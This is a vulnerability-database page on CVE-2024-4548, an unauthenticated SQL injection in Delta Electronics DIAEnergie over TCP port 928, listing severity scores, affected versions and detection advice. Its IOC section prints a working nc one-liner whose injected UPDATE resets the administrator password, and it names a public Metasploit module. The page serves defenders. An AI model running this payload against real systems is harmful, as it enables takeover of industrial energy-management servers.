CVE-2024-4548
published 2024-05-06CVE-2024-4548: An SQLi vulnerability exists in Delta Electronics DIAEnergie v1.10.1.8610 and prior when CEBC.exe processes a 'RecalculateHDMWYC' message, which is split into…
PriorityP179critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
29.43%
97.9th percentile
An SQLi vulnerability exists in Delta Electronics DIAEnergie v1.10.1.8610 and prior when CEBC.exe processes a 'RecalculateHDMWYC' message, which is split into 4 fields using the '~' character as the separator. An unauthenticated remote attacker can perform SQLi via the fourth field.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| delta_electronics | diaenergie | <= 1.10.1.8610 | — |
| deltaww | diaenergie | < 1.10.01.004 | 1.10.01.004 |
Detection & IOCsextracted from sources · hover to see the quote
commandecho -n "RecalculateHDMWYC~2024-01-01 00:00:00~2024-01-02 00:00:00~1); UPDATE DIAEnergie.dbo.DIAE_us SET pw=N'uV5SW+n71LS/S/Bjd426N1hNF1r70booEbICe8yhAxc=' WHERE uid=1;--" | nc 928↗
- →Monitor TCP port 928 for unauthenticated connections sending messages starting with 'RecalculateHDMWYC' — the fourth '~'-delimited field is the SQLi injection point. ↗
- →Detect SQL injection payloads in the fourth field of 'RecalculateHDMWYC' messages on TCP/928, specifically patterns containing SQL keywords such as INSERT, UPDATE, or stacked queries (e.g., ');). ↗
- →Exploitation results in command execution as NT AUTHORITY\SYSTEM via CEBC service; monitor for unexpected child processes spawned by CEBC.exe. ↗
- →A public Metasploit module exists for this vulnerability (exploits/windows/scada/diaenergie_sqli); monitor for exploitation attempts matching that module's traffic pattern on TCP/928. ↗
- ·The vulnerability is unauthenticated — no credentials are required to exploit TCP/928; the service must be network-accessible for exploitation to succeed. ↗
- ·Affected versions are DIAEnergie v1.10.1.8610 and prior; patched version is v1.10.01.004 or later. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
2024-05-06
Published